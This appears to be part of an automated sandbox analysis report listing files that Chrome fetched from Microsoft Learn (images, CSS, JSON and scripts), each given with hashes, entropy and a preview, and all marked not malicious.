                                                                                                                                                                                                SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1154
                                                                                                                                                                                                Entropy (8bit):4.59126408969148
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3130
                                                                                                                                                                                                Entropy (8bit):4.790069981348324
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):15427
                                                                                                                                                                                                Entropy (8bit):7.784472070227724
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):464328
                                                                                                                                                                                                Entropy (8bit):5.074669864961383
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                                MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                                SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                                SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                                SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                                Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                Entropy (8bit):3.875
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:HMB:k
                                                                                                                                                                                                MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                                SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                                SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                                SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                                Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):179335
                                                                                                                                                                                                Entropy (8bit):5.435182897681627
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVa:Wof3G0NSkNzMeO7z/l3a
                                                                                                                                                                                                MD5:517954FBCEBC2B0669606202492A4888
                                                                                                                                                                                                SHA1:404819BEF2964D493DF3CB29102719025BEA48AF
                                                                                                                                                                                                SHA-256:211DF9427FF68A7AA97490D30BABCEC089295E6219D461DD2946D24FE919DAEF
                                                                                                                                                                                                SHA-512:21F79D8CB099D874CB2AD32BCE04ADBDE919F3499363E51FE875C0EB409A4EEF555F349351DAB84E39214E26F5320E6E472C0A6A7C06A4CA9EFD1421174CA0C3
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):25441
                                                                                                                                                                                                Entropy (8bit):5.152769469811509
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                                MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                                SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                                SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                                SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):207935
                                                                                                                                                                                                Entropy (8bit):5.420780972514107
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                                Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):25441
                                                                                                                                                                                                Entropy (8bit):5.152769469811509
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                                MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                                SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                                SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                                SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                                Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):15427
                                                                                                                                                                                                Entropy (8bit):7.784472070227724
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):52717
                                                                                                                                                                                                Entropy (8bit):5.462668685745912
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):1432
                                                                                                                                                                                                Entropy (8bit):4.986131881931089
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                                Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):52717
                                                                                                                                                                                                Entropy (8bit):5.462668685745912
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                                Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):1173007
                                                                                                                                                                                                Entropy (8bit):5.503893944397598
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
